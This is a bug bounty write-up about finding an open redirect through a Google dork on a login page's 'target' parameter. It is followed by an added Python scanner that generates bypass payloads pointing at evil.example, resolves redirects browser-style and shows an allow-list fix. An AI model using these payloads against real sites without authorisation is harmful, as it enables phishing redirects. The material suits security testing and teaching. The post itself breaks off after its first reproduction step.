A swag for an Open Redirect — Google Dork — Bug Bounty

Hello folks 👋, I found a good open redirect with my param scanner. Here I will tell you how I found it and what kind of swag I got. I am also currently modifying my scanner, PSFuzz, so that it can scan for open redirects as well, and I will improve it over time. https://github.com/Proviesec/PSFuzz
And here is my story:
I was invited to a new private bug bounty programme and thought, well, I’ll look for the easy stuff first. Since I use Burp, I record my history with all redirects and links, which makes searching for bugs easier. After investigating a few simple security holes, I actually wanted to try to find some XSS. I also like to use Google Dorks; for example, I used
site:*redacted.com inurl:target
and got a result, so I checked whether it was suitable for an open redirect.
Steps To Reproduce:
- Behind the Google result was the login page of the website, and I always love to test these. This time I noticed that the parameter target contained a whole URL, which was very tempting to test.
The URL looks like this: https://my.redacted.com/forgetUsername?target=https:%2F%2Fwww.redacted.com
So you could already see that the redirect does not stay on the “my” subdomain but goes to the “www” subdomain.
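A parameter like target that carries a whole URL is exactly what you would want a scanner to probe automatically. The following Python is an added example and is not code from the original post or from PSFuzz: it builds the usual open-redirect payloads into the target parameter, and it resolves a Location value the way a browser would (scheme-relative URLs, backslashes, user-info tricks) to decide whether the redirect leaves the site. The allowed hosts my.redacted.com and www.redacted.com, the attacker host evil.example, and the naive string-matching check are assumptions made for the example.

```python
"""Open-redirect payload generation and browser-style Location checking.

Added example, not part of the original post or of PSFuzz.  Hosts, payload
set and the 'naive_check' function are assumptions made for illustration.
"""
from typing import Optional
from urllib.parse import parse_qsl, urlencode, urljoin, urlsplit, urlunsplit

# Hosts the application may legitimately redirect to (assumption; in the post
# the login page on "my" redirects to "www", so both are allow-listed here).
ALLOWED_HOSTS = {"my.redacted.com", "www.redacted.com"}

# Placeholder attacker-controlled host used in the payloads.
EVIL = "evil.example"

# The URL from the post, used as the request URL that Location values are
# resolved against.
BASE = "https://my.redacted.com/forgetUsername?target=https://www.redacted.com"

# Common payloads.  Each comment says which sloppy server-side check it beats.
PAYLOADS = [
    f"https://{EVIL}",                        # plain absolute URL (the basic case)
    f"//{EVIL}",                              # scheme-relative: browser adds https:
    f"/\\{EVIL}",                             # browsers treat "/\" like "//"
    f"https://{EVIL}\\@www.redacted.com",     # beats "take the host after @" parsing
    f"https://www.redacted.com.{EVIL}",       # beats startswith("https://www.redacted.com")
    f"https://evilredacted.com",              # beats endswith("redacted.com")
    f"https://{EVIL}/?next=www.redacted.com", # beats 'redacted.com' in target
]


def build_payloads(url: str, param: str, payloads=PAYLOADS) -> list:
    """Return copies of `url` with the value of `param` swapped for each payload.

    Other query parameters are kept so the request still looks legitimate.
    """
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    out = []
    for payload in payloads:
        query = [(k, payload if k == param else v) for k, v in pairs]
        out.append(urlunsplit(parts._replace(query=urlencode(query))))
    return out


def redirect_host(location: str, request_url: str) -> Optional[str]:
    """Host a browser would land on after following `location` from `request_url`.

    Browsers normalise "\\" to "/" for http(s) URLs, so "/\\evil" becomes "//evil"
    and "https://evil\\@good" becomes "https://evil/@good".  Python's parser does
    not do this, so it is done here before resolving relative references.
    """
    normalised = location.replace("\\", "/")
    return urlsplit(urljoin(request_url, normalised)).hostname


def is_open_redirect(location: str, request_url: str, allowed=ALLOWED_HOSTS) -> bool:
    """True if following `location` ends up on a host outside the allow-list."""
    host = redirect_host(location, request_url)
    return host is not None and host not in allowed


def naive_check(target: str) -> bool:
    """The kind of raw-string check that causes these bugs (assumed, for contrast)."""
    return target.startswith("https://www.redacted.com") or target.endswith("redacted.com")


def safe_target(target: str, request_url: str, default: str = "/") -> str:
    """Server-side fix: honour `target` only if its resolved host is allow-listed,
    otherwise fall back to a fixed default path on the current host."""
    if is_open_redirect(target, request_url):
        return urljoin(request_url, default)
    return urljoin(request_url, target.replace("\\", "/"))


if __name__ == "__main__":
    for candidate in build_payloads(BASE, "target"):
        print("probe:", candidate)
    for payload in PAYLOADS:
        print(f"{payload!r:48} -> {redirect_host(payload, BASE)!s:32} "
              f"naive ok: {naive_check(payload)!s:5} open redirect: {is_open_redirect(payload, BASE)}")
```

In a real scan each URL from build_payloads is requested without following redirects and its Location header is passed to is_open_redirect; the point of resolving the header like a browser is that a payload such as `/\evil.example` looks like a harmless path to a string check but still leaves the site.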